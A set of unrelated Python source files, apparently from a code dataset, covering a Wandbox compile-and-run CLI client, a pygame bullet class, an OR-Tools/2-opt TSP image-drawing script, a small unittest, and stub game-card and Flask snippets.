    Prints diagnostics and exits(1) on any unsupported setting; known
    c++NN/c++Nx spelling mismatches are auto-corrected in place.
    """
    has_error = False
    if not find_compiler(options.compiler):
        print('Wandbox is not supported compiler [' + options.compiler + ']')
        listup_compiler(options.verbose)
        has_error = True
    if options.options or options.std:
        opt = get_options(options.compiler)
        if options.options:
            for o in options.options.split(','):
                if o not in opt:
                    print_undefined_option(o, options.compiler)
                    has_error = True
        if options.std:
            if options.std not in opt:
                print_undefined_option(options.std, options.compiler)
                prev_std_option = options.std
                # Try both directions of each provisional/final spelling pair;
                # the first match mutates options.std.
                if check_std_option_compatible(options, 'c++1z', 'c++17', opt) or \
                        check_std_option_compatible(options, 'gnu++1z', 'gnu++17', opt) or \
                        check_std_option_compatible(options, 'c++1y', 'c++14', opt) or \
                        check_std_option_compatible(options, 'gnu++1y', 'gnu++14', opt) or \
                        check_std_option_compatible(options, 'c++0x', 'c++11', opt) or \
                        check_std_option_compatible(options, 'gnu++0x', 'gnu++11', opt):
                    pass
                if (options.std == prev_std_option):
                    # No compatible spelling found; it is a real error.
                    has_error = True
        if has_error:
            listup_options(options.compiler)
    if has_error:
        sys.exit(1)
    if options.default:
        print('--default option is deprecated. default options are always set.')
# setup additional files
def add_files(w, fileinfos):
    """Register every (filename, code) pair from *fileinfos* on the request."""
    for name, source in fileinfos.items():
        w.add_file(name, source)
# create opt list
def create_option_list(options):
    """Build the Wandbox option-name list from defaults + user selections.

    Starts from the compiler's default switches (unless --no-default),
    merges -x/--options, then applies --std/--optimize/--cpp-verbose/
    --boost/--sprout/--msgpack.  Only one C++ standard option survives.
    """
    def filterout_cppver(opt):
        # Drop any previously selected C++/GNU++ standard.
        tmp = list(filter(lambda s: s.find('c++') == -1, opt))
        tmp = list(filter(lambda s: s.find('gnu++') == -1, tmp))
        return tmp
    opt = []
    if not options.no_default:
        opt = get_default_options(options.compiler)
    if options.options:
        for o in options.options.split(','):
            if o not in opt:
                if (o.find('c++') == 0) or (o.find('gnu++') == 0):
                    opt = filterout_cppver(opt)
                opt.append(o)
    # std
    if options.std:
        opt = filterout_cppver(opt)
        opt.append(options.std)
    # optimize
    if options.optimize and ('optimize' not in opt):
        opt.append('optimize')
    # cpp-verbose
    if options.cpp_verbose and ('cpp-verbose' not in opt):
        opt.append('cpp-verbose')
    # boost
    if workaround:
        pass
        # if options.compiler in ['clang-3.4', 'clang-3.3']:
        #     if not options.boost:
        #         options.boost = 'nothing'
    if options.boost:
        # Wandbox boost option names embed the compiler, e.g.
        # 'boost-1.64-gcc-head'.
        if options.compiler not in options.boost:
            options.boost = options.boost + '-' + options.compiler
        opt = list(filter(lambda s: s.find('boost') == -1, opt))
        opt.append('boost-' + str(options.boost))
    # sprout
    if options.sprout and ('sprout' not in opt):
        opt.append('sprout')
    # msgpack
    if options.msgpack and ('msgpack' not in opt):
        opt.append('msgpack')
    return opt
def expand_wandbox_options(w, compiler, options):
    """Translate Wandbox switch names into raw compiler flags.

    Looks up *compiler* in the Wandbox compiler list, builds a
    name -> display-flags table from its switches (flat and grouped), and
    expands every entry of *options* that has a known flag string.
    """
    flag_table = {}
    for entry in w.get_compiler_list():
        if entry['name'] != compiler:
            continue
        for switch in entry.get('switches', []):
            if 'name' in switch and 'display-flags' in switch:
                flag_table[switch['name']] = switch['display-flags']
            elif 'options' in switch:
                for sub in switch['options']:
                    if 'name' in sub and 'display-flags' in sub:
                        flag_table[sub['name']] = sub['display-flags']
    expanded = []
    for opt in options:
        if opt in flag_table:
            expanded.extend(flag_table[opt].split())
    return expanded
def wandbox_api_call(callback, retries, retry_wait):
    """Invoke *callback*, retrying on transient Wandbox API failures.

    Retries (sleeping *retry_wait* seconds between attempts, recursing with
    retries - 1) when the call raised a requests ConnectionError, an
    HTTPError with no response object, or an HTTP 504.  Anything else is
    re-raised unchanged.
    """
    try:
        return callback()
    except (HTTPError, ConnectionError) as e:
        def is_retry(e):
            if not e.response:
                return True
            return e.response.status_code in [504]
        if is_retry(e) and retries > 0:
            try:
                # NOTE(review): e.message is a Python 2 attribute; on
                # Python 3 this raises and the message is silently skipped.
                print(e.message)
            except:
                pass
            print('wait {0}sec...'.format(retry_wait))
            sleep(retry_wait)
            return wandbox_api_call(callback, retries - 1, retry_wait)
        else:
            raise
    except:
        raise
def wandbox_get_compilerlist():
    # Fetch the compiler list using the module-level retry settings.
    return wandbox_api_call(Wandbox.GetCompilerList, api_retries, api_retry_wait)
def wandbox_get_compilerswitches(compiler):
    """Return the 'switches' list for *compiler*, or [] when absent."""
    for entry in wandbox_get_compilerlist():
        if entry['name'] == compiler and 'switches' in entry:
            return entry['switches']
    return []
def run_wandbox_impl(w, options):
    """Execute the fully prepared Wandbox request, with retry.

    Honors --dryrun by exiting before any network traffic.
    """
    if options.dryrun:
        sys.exit(0)
    retries = options.retry
    def run():
        return w.run()
    return wandbox_api_call(run, retries, options.retry_wait)
def create_compiler_raw_option_list(options):
    """Build the raw compiler-option list from -f/--compiler-option-raw.

    Each raw argument is stripped of surrounding quotes and split at
    whitespace that precedes a '-' (so flags with embedded spaces survive).
    Appends -DIUTEST_USE_MAIN when --iutest-use-main was given.
    """
    colist = []
    if options.compiler_option_raw:
        raw_options = options.compiler_option_raw
        for x in raw_options:
            # BUGFIX: raw string for the regex -- '\s' in a plain string is
            # an invalid escape sequence in modern Python.
            colist.extend(re.split(r'\s(?=-)', x.strip('"')))
    if options.iutest_use_main:
        colist.append('-DIUTEST_USE_MAIN')
    return colist
# run wandbox (makefile)
def run_wandbox_make(main_filepath, code, includes, impliments, options):
    """Run on Wandbox via a generated Makefile under the 'bash' compiler.

    Synthesizes a Makefile (one .o per implementation file) plus a small
    bash driver that runs make and then ./prog with the raw runtime
    options.  All compiler flags are folded into CXXFLAGS.
    """
    with Wandbox() as w:
        w.compiler('bash')
        woptions = create_option_list(options)
        if options.stdin:
            w.stdin(options.stdin)
        # The main source becomes just another attached implementation file.
        impliments[os.path.basename(main_filepath)] = code
        colist = create_compiler_raw_option_list(options)
        colist.extend(expand_wandbox_options(w, options.compiler, woptions))
        rolist = []
        if options.runtime_option_raw:
            for opt in options.runtime_option_raw:
                rolist.extend(opt.split())
        makefile = '#!/bin/make\n# generate makefile by iuwandbox.py\n'
        makefile += '\nCXXFLAGS+='
        for opt in colist:
            makefile += opt + ' '
        makefile += '\nOBJS='
        for filename in impliments.keys():
            makefile += os.path.splitext(filename)[0] + '.o '
        makefile += '\n\
prog: $(OBJS)\n\
\t$(CXX) -o $@ $^ $(CXXFLAGS) $(LDFLAGS)\n\
'
        impliments['Makefile'] = makefile
        bashscript = 'make -j 4\n'
        bashscript += './prog '
        for opt in rolist:
            bashscript += opt + ' '
        bashscript += '\n'
        # The "code" submitted to Wandbox is the bash driver script.
        w.code(bashscript)
        if options.save:
            w.permanent_link(options.save)
        if options.verbose:
            w.dump()
        add_files(w, impliments)
        add_files(w, includes)
        return run_wandbox_impl(w, options)
# run wandbox (cxx)
def run_wandbox_cxx(code, includes, impliments, options):
    """Submit a direct C++ compile/run request to Wandbox."""
    with Wandbox() as w:
        w.compiler(options.compiler)
        w.options(','.join(create_option_list(options)))
        if options.stdin:
            w.stdin(options.stdin)
        colist = create_compiler_raw_option_list(options)
        if workaround:
            # Compiler-specific quirks kept behind the module-level flag.
            if options.compiler in ['clang-3.2']:
                colist.append('-ftemplate-depth=1024')
            # if options.compiler in ['clang-3.4']:
            #     colist.append('-DIUTEST_HAS_HDR_CXXABI=0')
            # if options.compiler in ['clang-3.3', 'clang-3.2', 'clang-3.1', 'clang-3.0']:
            #     colist.append('-Qunused-arguments')
            # if options.compiler in ['clang-3.4', 'clang-3.3']:
            #     colist.append('-fno-exceptions')
            #     colist.append('-fno-rtti')
            pass
        if colist:
            # Wandbox expects newline-separated raw options; also unescape
            # literal "\n" sequences the user may have passed.
            co = '\n'.join(colist)
            co = co.replace('\\n', '\n')
            w.compiler_options(co)
        if options.runtime_option_raw:
            rolist = []
            for opt in options.runtime_option_raw:
                rolist.extend(opt.split())
            ro = '\n'.join(rolist)
            ro = ro.replace('\\n', '\n')
            w.runtime_options(ro)
        if options.save:
            w.permanent_link(options.save)
        for filename in impliments.keys():
            w.add_compiler_options(filename)
        if options.verbose:
            w.dump()
        w.code(code)
        add_files(w, impliments)
        add_files(w, includes)
        return run_wandbox_impl(w, options)
# run wandbox
def run_wandbox(main_filepath, code, includes, impliments, options):
    """Dispatch to the makefile-based or direct C++ compile flow."""
    if not options.make:
        return run_wandbox_cxx(code, includes, impliments, options)
    return run_wandbox_make(main_filepath, code, includes, impliments, options)
def wandbox_hint(r):
    """Print troubleshooting hints for well-known iutest/boost link errors."""
    compiler_error = r.get('compiler_error')
    if not compiler_error:
        return
    if 'undefined reference to `main' in compiler_error:
        print('hint:')
        print(' In "iutest" you can omit the definition of the main function, please define IUTEST_USE_MAIN. (--iutest-use-main or -f"-DIUTEST_USE_MAIN")')
    elif 'undefined reference to `init_unit_test_suite' in compiler_error:
        print('hint:')
        print(' If you do not use boost test, please specify the file with the main function first.')
def text_transform(value):
    """Normalize Wandbox response text to a printable str.

    BUGFIX: the original relied on Python 2 semantics (`str.decode` and the
    `unicode` builtin) wrapped in a bare try/except, which made the function
    a silent no-op on Python 3 and could mask real errors.  Bytes are now
    decoded explicitly; any other value is returned unchanged.
    """
    if isinstance(value, bytes):
        # Wandbox responses are UTF-8 text; replace undecodable bytes
        # rather than raising while printing results.
        return value.decode('utf-8', errors='replace')
    return value
# show result
def show_result(r, options):
    """Print a Wandbox run result and return its exit status.

    Exits the process directly on timeout (r is None) or an API 'error'.
    With --stderr the compiler/program error streams go to stderr;
    otherwise the combined *_message fields are printed.
    """
    if r is None:
        print('failed: timeout...')
        sys.exit(1)
    if 'error' in r:
        print(r['error'])
        sys.exit(1)
    if options.stderr:
        if 'compiler_output' in r:
            print('compiler_output:')
            print(text_transform(r['compiler_output']))
        if 'compiler_error' in r:
            sys.stderr.write(text_transform(r['compiler_error']))
        if 'program_output' in r:
            print('program_output:')
            print(text_transform(r['program_output']))
        # When an xml/junit report is requested, run() writes program_error
        # to the report file instead of echoing it here.
        if options.xml is None and options.junit is None and 'program_error' in r:
            sys.stderr.write(text_transform(r['program_error']))
    else:
        if 'compiler_message' in r:
            print('compiler_message:')
            print(text_transform(r['compiler_message']))
        if 'program_message' in r:
            print('program_message:')
            print(text_transform(r['program_message']))
    if 'url' in r:
        print('permlink: ' + r['permlink'])
        print('url: ' + r['url'])
    if 'signal' in r:
        print('signal: ' + r['signal'])
    wandbox_hint(r)
    if 'status' in r:
        return int(r['status'])
    return 1
# show parameter
def show_parameter(r):
    """Print the compile parameters stored with a permlink."""
    labeled_keys = (
        ('compiler', 'compiler:'),
        ('options', 'options:'),
        ('compiler-option-raw', 'compiler-option-raw:'),
        ('runtime-option-raw', 'runtime-option-raw'),
    )
    for key, label in labeled_keys:
        if key in r:
            print(label + r[key])
    if 'created-at' in r:
        print(r['created-at'])
def set_output_xml(options, t, xml):
    """Force stderr capture and append an --iutest_output=<type>:<file>
    runtime option so the test run writes its report to *xml*."""
    options.stderr = True
    new_option = '--iutest_output=' + t + ':' + xml
    if options.runtime_option_raw:
        options.runtime_option_raw.append(new_option)
    else:
        options.runtime_option_raw = [new_option]
def run(options):
    """Build the source bundle, run it on Wandbox, and exit with its status."""
    main_filepath = options.code[0].strip()
    if not os.path.exists(main_filepath):
        # NOTE(review): exits silently when the input file is missing;
        # an error message here would help users.
        sys.exit(1)
    includes = {}
    included_files = {}
    impliments = {}
    code = make_code(main_filepath, options.encoding, options.expand_include, includes, included_files)
    # Additional source files become attached implementation files.
    for filepath_ in options.code[1:]:
        filepath = filepath_.strip()
        impliments[os.path.basename(filepath)] = make_code(filepath, options.encoding, options.expand_include, includes, included_files)
    if options.output:
        # Dump the generated main source for inspection.
        f = file_open(options.output, 'w', options.encoding)
        f.write(code)
        f.close()
    xml = None
    if options.xml:
        xml = options.xml
        set_output_xml(options, 'xml', xml)
    if options.junit:
        xml = options.junit
        set_output_xml(options, 'junit', xml)
    r = run_wandbox(main_filepath, code, includes, impliments, options)
    b = show_result(r, options)
    if xml and 'program_error' in r:
        # iutest writes the report to stderr on Wandbox; save it locally.
        f = file_open(xml, 'w', options.encoding)
        f.write(r['program_error'])
        f.close()
    sys.exit(b)
# listup compiler
def listup_compiler(verbose):
    """Print every C++ compiler Wandbox offers (with version when verbose)."""
    for entry in wandbox_get_compilerlist():
        if entry['language'] != 'C++':
            continue
        if verbose:
            print(entry['name'] + ' (' + entry['version'] + ')')
        else:
            print(entry['name'])
# find compiler
def find_compiler(c):
    """True when Wandbox lists *c* as a C++ compiler."""
    return any(
        entry['language'] == 'C++' and entry['name'] == c
        for entry in wandbox_get_compilerlist()
    )
# listup options
def listup_options(compiler):
    """Print every switch name for *compiler*, marking default selections."""
    r = wandbox_get_compilerlist()
    for d in r:
        if d['name'] == compiler:
            print('# ' + compiler)
            if 'switches' in d:
                switches = d['switches']
                for s in switches:
                    if 'name' in s:
                        # NOTE(review): assumes boolean switches always carry
                        # a 'default' key -- would KeyError otherwise; confirm
                        # against the Wandbox API schema.
                        if s['default']:
                            print(s['name'] + ' (default)')
                        else:
                            print(s['name'])
                    elif 'options' in s:
                        # Grouped (radio-style) switch: default name first,
                        # then each selectable option indented.
                        print(s['default'] + ' (default)')
                        for o in s['options']:
                            print(' ' + o['name'])
def get_options(compiler):
    """Collect every selectable option name for *compiler*."""
    names = []
    for switch in wandbox_get_compilerswitches(compiler):
        if 'name' in switch:
            names.append(switch['name'])
        elif 'options' in switch:
            names.append(switch['default'])
            names.extend(sub['name'] for sub in switch['options'])
    return names
# get default options
def get_default_options(compiler):
    """Collect the options Wandbox enables by default for *compiler*."""
    defaults = []
    for switch in wandbox_get_compilerswitches(compiler):
        if 'name' in switch:
            if switch['default']:
                defaults.append(switch['name'])
        elif 'options' in switch:
            defaults.append(switch['default'])
    return defaults
# get permlink
def get_permlink(options):
    """Fetch a saved permlink, print its parameters and result, optionally
    dump the stored source to options.output, then exit with the run status."""
    r = Wandbox.GetPermlink(options.permlink)
    p = r['parameter']
    show_parameter(p)
    print('result:')
    b = show_result(r['result'], options)
    if options.output:
        f = open(options.output, 'w')
        f.write(p['code'])
        f.close()
    sys.exit(b)
def main():
    """CLI entry point: list compilers/options, fetch a permlink, or run code."""
    opts, parser = parse_command_line()
    if opts.list_compiler:
        listup_compiler(opts.verbose)
    elif opts.list_options:
        listup_options(opts.list_options)
    elif opts.permlink:
        get_permlink(opts)
    else:
        if opts.check_config:
            check_config(opts)
        elif not opts.code:
            # Nothing to compile and no config check requested: show usage.
            parser.print_help()
            sys.exit(1)
        run(opts)


if __name__ == '__main__':
    main()
| StarcoderdataPython |
4972729 | from project.models import db, Term, Translation
from app import app
from flask import current_app
# Create all tables declared on the SQLAlchemy metadata (Term, Translation);
# db.create_all() needs an active Flask application context to resolve the
# configured database engine.
with app.app_context():
    db.create_all()
| StarcoderdataPython |
277495 | import pygame
from Tile import Tile
from Zombie import Zombie
from Character import Direction
__author__ = '<NAME>, <NAME>, <NAME>'
class Bullet(pygame.Rect):
    """A projectile fired by the player; subclasses pygame.Rect so the
    bullet *is* its own collision rectangle.

    Class-level state: ``list_`` holds every bullet currently in flight,
    the ``*_BULLET_DISTANCE`` constants throttle how soon the pistol and
    shotgun may fire again, and ``_gun_damage`` maps weapon type to the
    damage one hit deals (derived from Zombie.START_HEALTH).
    """
    # Why this default width and height values here?
    # width, height = 7, 10
    list_ = []  # all bullets currently in flight (shared, mutated by update())
    # Minimum distance the previous bullet must have travelled before the
    # same weapon type may spawn another bullet (crude rate-of-fire limit).
    SHOTGUN_BULLET_DISTANCE = 50
    PISTOL_BULLET_DISTANCE = 30
    LAST_BULLET_INDEX = -1  # index of the most recently fired bullet in list_
    _weapon_bullet_images = {'pistol': pygame.image.load('images/weapon/pistol_b.png'),
                             'shotgun': pygame.image.load('images/weapon/shotgun_b.png'),
                             'automatic': pygame.image.load('images/weapon/automatic_b.png')}
    _gun_damage = {'pistol': (Zombie.START_HEALTH / 3) + 1,
                   'shotgun': Zombie.START_HEALTH / 2,
                   'automatic': (Zombie.START_HEALTH / 6) + 1}
    def __init__(self, x, y, velx, vely, direction, type_):
        # Restricts the firing rate of the shotgun and the pistol
        # NOTE(review): when the rate check fails, pygame.Rect.__init__ is
        # never called, leaving a half-constructed (but also unregistered)
        # object — confirm callers discard the instance in that case.
        if Bullet.__firing_rate_check(x, y, type_):
            self.type = type_
            self.direction = direction
            self.velx, self.vely = velx, vely
            self.__rotation_transformation(direction, type_)
            pygame.Rect.__init__(self, x, y, self.img.get_width(), self.img.get_height())
            Bullet.list_.append(self)
    # Check if the last bullet fired was far enough from the
    # previous bullet to shoot another one
    @staticmethod
    def __firing_rate_check(x, y, gun_type):
        # We have some existing bullets
        if len(Bullet.list_) > 0:
            # Get the x & y differences to the last bullet created
            dx = abs( Bullet.list_[Bullet.LAST_BULLET_INDEX].x - x )
            dy = abs( Bullet.list_[Bullet.LAST_BULLET_INDEX].y - y )
            # Since the Bullet is either moving in the x or y plane, thus either dy or dx will be zero.
            # Grab whichever is NOT zero
            distance_to_last_bullet = max(dy, dx)
            if gun_type == 'shotgun':
                if distance_to_last_bullet < Bullet.SHOTGUN_BULLET_DISTANCE:
                    return False
            elif gun_type == 'pistol':
                if distance_to_last_bullet < Bullet.PISTOL_BULLET_DISTANCE:
                    return False
        # The automatic has no rate limit; first bullet is always allowed.
        return True
    # Change the image direction of the bullet
    def __rotation_transformation(self, direction, type_):
        # The base bullet sprites face WEST; rotate/flip to match travel direction.
        if direction == Direction.NORTH:
            # Just rotate clockwise 90 degrees is enough
            self.img = pygame.transform.rotate(Bullet._weapon_bullet_images[type_], -90)
        elif direction == Direction.SOUTH:
            self.img = pygame.transform.rotate(Bullet._weapon_bullet_images[type_], 90)  # CCW
        elif direction == Direction.EAST:
            self.img = pygame.transform.flip(Bullet._weapon_bullet_images[type_], True, False)
        elif direction == Direction.WEST:
            self.img = Bullet._weapon_bullet_images[type_]
    # Returns a boolean value on whether or not the bullet is off the screen
    def offscreen(self, screen):
        if self.x < 0:  # left side
            return True
        elif self.y < 0:  # up
            return True
        elif self.x + self.width > screen.get_width():  # right edge
            return True
        elif self.y + self.height > screen.get_height():  # down
            return True
        return False
    @staticmethod
    def update(screen):
        """Advance, draw and collision-test every live bullet for one frame.

        NOTE(review): this removes elements from Bullet.list_ while
        iterating over it, which can skip the bullet that follows a removed
        one for a frame — consider iterating over a copy.
        """
        for bullet in Bullet.list_:
            # update bullet position
            bullet.x += bullet.velx
            bullet.y += bullet.vely
            # draw bullet on screen
            screen.blit(bullet.img, (bullet.x, bullet.y))
            if bullet.offscreen(screen):
                Bullet.list_.remove(bullet)
                continue
            # Check if any bullet has hit a zombie
            for zombie in Zombie.list_:
                if bullet.colliderect(zombie):
                    zombie.health -= Bullet._gun_damage[bullet.type]
                    Bullet.list_.remove(bullet)
                    break
            # Check if a bullet has hit a wall
            for tile in Tile.list_:
                rect = pygame.Rect(bullet.x + bullet.velx, bullet.y + bullet.vely, bullet.width, bullet.height)
                if rect.colliderect(tile) and not(tile.walkable):
                    # I think the try block is because we might have already removed this bullet
                    # when it hit a zombie?
                    try:
                        Bullet.list_.remove(bullet)
                    except:
                        break
| StarcoderdataPython |
12852288 | <reponame>wenderlemes/gcc218_trabalho_pratico<filename>draw-tsp-path.py
"""Modified code from https://developers.google.com/optimization/routing/tsp#or-tools """
# Copyright <NAME> (c) 2020 under CC-BY 4.0: https://creativecommons.org/licenses/by/4.0/
from __future__ import print_function
import math
from ortools.constraint_solver import routing_enums_pb2
from ortools.constraint_solver import pywrapcp
from PIL import Image, ImageDraw
import os
import time
import copy
from itertools import permutations
# Change these file names to the relevant files.
ORIGINAL_IMAGE = "images/brother-1024-stipple.png"
IMAGE_TSP = "images/brother-1024-stipple.tsp"
# Change the number of points according to the base tsp file you are using.
NUMBER_OF_POINTS = 1024
# Number of contiguous tour slices 2-opt optimises independently (halved on
# each pass in two_opt_solution); assumed to divide NUMBER_OF_POINTS — TODO confirm.
NUMBER_OF_PARTITIONS = 8
# Tour start node used by the greedy construction and the group<->solution converters.
INITIAL_VERTEX = 0
def create_data_model():
    """Stores the data for the problem.

    Parses node coordinates out of IMAGE_TSP (TSPLIB-style: six header
    lines, then "index x y" per line) and returns the routing data dict.
    """
    coordinates = []
    with open(IMAGE_TSP) as tsp_file:
        for _ in range(6):
            next(tsp_file)  # skip the TSPLIB header
        for line in tsp_file:
            _, x, y = line.split()
            coordinates.append((int(float(x)), int(float(y))))
    return {
        'locations': coordinates,  # locations in block units
        'num_vehicles': 1,
        'depot': 0,
    }
def compute_euclidean_distance_matrix(locations):
    """Return a dict-of-dicts of pairwise Euclidean distances (truncated to int)."""
    distances = {}
    for i, p in enumerate(locations):
        row = {}
        for j, q in enumerate(locations):
            if i == j:
                row[j] = 0
            else:
                # Truncate (not round) to match integer arc costs.
                row[j] = int(math.hypot(p[0] - q[0], p[1] - q[1]))
        distances[i] = row
    return distances
def print_solution(manager, routing, solution):
    """Prints solution on console.

    Walks vehicle 0's route in the OR-Tools *solution*, printing the node
    sequence followed by the accumulated arc cost.
    """
    print('Objective: {}'.format(solution.ObjectiveValue()))
    index = routing.Start(0)
    plan_output = 'Route:\n'
    route_distance = 0
    while not routing.IsEnd(index):
        plan_output += ' {} ->'.format(manager.IndexToNode(index))
        previous_index = index
        index = solution.Value(routing.NextVar(index))
        route_distance += routing.GetArcCostForVehicle(previous_index, index, 0)
    plan_output += ' {}\n'.format(manager.IndexToNode(index))
    # Bug fix: the distance line used to be appended *after* print(), so it
    # was never displayed. Build the full report first, then print once.
    plan_output += 'Objective: {}m\n'.format(route_distance)
    print(plan_output)
def get_routes(solution, routing, manager):
    """Get vehicle routes from a solution and store them in an array.

    NOTE(review): despite the OR-Tools-style signature, *solution* here is
    the next-node dict produced by two_opt_solution / nearest-neighbour
    code, not an OR-Tools assignment — the commented lines below are the
    old OR-Tools walk.
    """
    # Get vehicle routes and store them in a two dimensional array whose
    # i,j entry is the jth location visited by vehicle i along its route.
    routes = []
    for route_nbr in range(routing.vehicles()):
        index = routing.Start(route_nbr)
        route = [manager.IndexToNode(index)]
        #while not routing.IsEnd(index):
        #  index = solution.Value(routing.NextVar(index))
        counter = 0
        # Follow the next-node mapping for len(solution) hops.
        # NOTE(review): the last hop follows the NUMBER_OF_POINTS sentinel
        # stored by convert_group_to_solution — confirm the final appended
        # node is intended.
        while counter < len(solution):
            counter += 1
            index = solution[index]
            route.append(manager.IndexToNode(index))
        routes.append(route)
    return routes[0]
def draw_routes(nodes, path):
    """Takes a set of nodes and a path, and outputs an image of the drawn TSP path"""
    # Translate node indices along the path into pixel coordinates.
    tour_points = [nodes[int(stop)] for stop in path]
    original_image = Image.open(ORIGINAL_IMAGE)
    width, height = original_image.size
    canvas = Image.new("RGBA", (width, height), color='white')
    pen = ImageDraw.Draw(canvas)
    pen.line(tour_points, fill='black', width=1)
    # The .tsp coordinates are y-up, image coordinates are y-down.
    canvas = canvas.transpose(Image.FLIP_TOP_BOTTOM)
    FINAL_IMAGE = IMAGE_TSP.replace("-stipple.tsp", "-tsp.png")
    canvas.save(FINAL_IMAGE)
    print("TSP solution has been drawn and can be viewed at", FINAL_IMAGE)
def nearest_neighbors_solution(distance_matrix):
    """Greedy nearest-neighbour tour over all NUMBER_OF_POINTS nodes.

    Starting at INITIAL_VERTEX, repeatedly hops to the closest unvisited
    node. Returns a next-node mapping; the last node maps back to
    INITIAL_VERTEX to close the tour.
    """
    visited = {v: False for v in range(NUMBER_OF_POINTS)}
    successor = {v: -1 for v in range(NUMBER_OF_POINTS)}
    current = INITIAL_VERTEX
    while True:
        visited[current] = True
        best_distance = float("inf")
        best_node = -1
        for candidate in distance_matrix[current]:
            if not visited[candidate] and distance_matrix[current][candidate] < best_distance:
                best_distance = distance_matrix[current][candidate]
                best_node = candidate
        if best_node == -1:
            # Every node visited: close the cycle and stop.
            successor[current] = INITIAL_VERTEX
            return successor
        successor[current] = best_node
        current = best_node
def two_opt_solution(distance_matrix):
    """Improve the greedy tour with partitioned 2-opt passes.

    Builds the nearest-neighbour tour, then runs 2-opt on
    NUMBER_OF_PARTITIONS slices, halving the partition count each pass
    until a single whole-tour pass is done. Returns a next-node mapping.
    """
    tour = convert_solution_to_group(nearest_neighbors_solution(distance_matrix))
    partitions = NUMBER_OF_PARTITIONS
    while partitions > 0:
        two_opt(distance_matrix, tour, partitions)
        partitions = int(partitions / 2)
    return convert_group_to_solution(tour)
def two_opt(distance_matrix, group, partitions):
    """In-place 2-opt improvement of the tour list *group*, applied
    independently to each of *partitions* equal contiguous slices.

    Within each slice, repeatedly finds the single best improving edge swap
    and applies it until no improving move remains.
    """
    partition_size = int(len(group)/partitions)
    for k in range(partitions):
        while True:
            min_change = 0
            min_i = -1
            min_j = -1
            # Scan all (i, j) pairs in slice k: replacing edges (u,v) and
            # (w,x) with (u,w) and (v,x) reverses the segment v..w.
            for i in range(1 + (k*partition_size), ((k+1)*partition_size)-2):
                for j in range(i+1, ((k+1)*partition_size)):
                    u = group[i-1]
                    v = group[i]
                    w = group[j]
                    x = group[(j+1) % ((k+1)*partition_size)]
                    current_distance = (distance_matrix[u][v] + distance_matrix[w][x])
                    new_distance = (distance_matrix[u][w] + distance_matrix[v][x])
                    change = new_distance - current_distance
                    if change < min_change:
                        min_change = change
                        min_i = i
                        min_j = j
            # NOTE(review): when no improving move was found this calls
            # swap_edges(group, -1, -1), which is a harmless no-op
            # (group[-1:0] is an empty slice).
            swap_edges(group, min_i, min_j)
            if min_change == 0:
                break
            print(min_change)  # NOTE(review): debug output left in — consider removing
def swap_edges(group, v, w):
    """Reverse group[v..w] (both endpoints included) in place."""
    segment = group[v:w + 1]
    segment.reverse()
    group[v:w + 1] = segment
def convert_group_to_solution(group):
    """Convert an ordered tour list into a next-node mapping.

    Each node maps to its successor; the final node maps to the sentinel
    NUMBER_OF_POINTS, which get_routes uses as a stop marker.
    """
    solution = {}
    for i in range(len(group)-1):
        solution[group[i]] = group[i+1]
    solution[group[-1]] = NUMBER_OF_POINTS
    # Fix: removed leftover debug print of the whole mapping (noisy for
    # 1024-node tours and not part of this function's contract).
    return solution
def convert_solution_to_group(solution):
    """Convert a next-node mapping back into an ordered tour list.

    Starts at INITIAL_VERTEX and follows the mapping for
    NUMBER_OF_POINTS hops.
    """
    tour = []
    node = INITIAL_VERTEX
    for _ in range(NUMBER_OF_POINTS):
        tour.append(node)
        node = solution[node]
    return tour
def calculate_group_cost(distance_matrix, group):
    """Total length of the closed tour *group* under *distance_matrix*
    (includes the wrap-around edge from the last node back to the first)."""
    n = len(group)
    return sum(distance_matrix[group[i]][group[(i + 1) % n]] for i in range(n))
def main():
    """Entry point of the program.

    NOTE(review): the OR-Tools manager/routing/search-parameter setup below
    is mostly vestigial — solving is done by the custom two_opt_solution(),
    and routing/manager are only used for index bookkeeping in get_routes.
    """
    starting_moment = time.time()
    # Instantiate the data problem.
    print("Step 1/5: Initialising variables")
    data = create_data_model()
    # Create the routing index manager.
    manager = pywrapcp.RoutingIndexManager(len(data['locations']),
                                           data['num_vehicles'], data['depot'])
    # Create Routing Model.
    routing = pywrapcp.RoutingModel(manager)
    print("Step 2/5: Computing distance matrix")
    distance_matrix = compute_euclidean_distance_matrix(data['locations'])
    def distance_callback(from_index, to_index):
        """Returns the distance between the two nodes."""
        # Convert from routing variable Index to distance matrix NodeIndex.
        from_node = manager.IndexToNode(from_index)
        to_node = manager.IndexToNode(to_index)
        return distance_matrix[from_node][to_node]
    transit_callback_index = routing.RegisterTransitCallback(distance_callback)
    # Define cost of each arc.
    routing.SetArcCostEvaluatorOfAllVehicles(transit_callback_index)
    # Setting first solution heuristic.
    print("Step 3/5: Setting an initial solution")
    search_parameters = pywrapcp.DefaultRoutingSearchParameters()
    search_parameters.first_solution_strategy = (
        routing_enums_pb2.FirstSolutionStrategy.PATH_CHEAPEST_ARC)
    # Solve the problem.
    print("Step 4/5: Solving")
    #solution = routing.SolveWithParameters(search_parameters)
    #solution = nearest_neighbors_solution(distance_matrix)
    solution = two_opt_solution(distance_matrix)
    # Print solution on console.
    if solution:
        #print_solution(manager, routing, solution)
        print("Step 5/5: Drawing the solution")
        routes = get_routes(solution, routing, manager)
        draw_routes(data['locations'], routes)
    else:
        print("A solution couldn't be found :(")
    finishing_moment = time.time()
    print("Total time elapsed during execution: " + str(finishing_moment - starting_moment) + " seconds")
    print("Total distance: " + str(calculate_group_cost(distance_matrix, convert_solution_to_group(solution))))
if __name__ == '__main__':
    main()
3217064 | import configuration
import unittest
#https://docs.python.org/2/library/unittest.html
class PowerDeviationMatrixConfigurationTest(unittest.TestCase):
    """Smoke test: loading the power-deviation matrix XML and indexing it."""
    def setUp(self):
        pass
    def tearDown(self):
        pass
    def test_matrix_value(self):
        # NOTE(review): hard-coded absolute path only exists on the original
        # author's machine — consider a relative fixture path.
        matrix = configuration.PowerDeviationMatrixConfiguration("/Users/stuart/PCWG/Data/PowerDeviationMatrix.xml")
        self.assertEqual(matrix[(0.011, 0.55)], 0.01)
def MatrixSuite():
    """Build a suite containing the single matrix-value test."""
    suite = unittest.TestSuite()
    suite.addTest(PowerDeviationMatrixConfigurationTest('test_matrix_value'))
    return suite
# Runs the suite immediately on import (this script has no __main__ guard).
unittest.TextTestRunner(verbosity=2).run(MatrixSuite())
| StarcoderdataPython |
8093388 | from csrv.model.cards import card_info
from csrv.model.cards import resource
class Card01052(resource.Resource):
    """Neutral runner resource, Core set card #52.

    Costs 1, carries the "link" keyword, and grants +1 link strength while
    installed (revoked on uninstall).
    """
    NAME = u'Card01052'
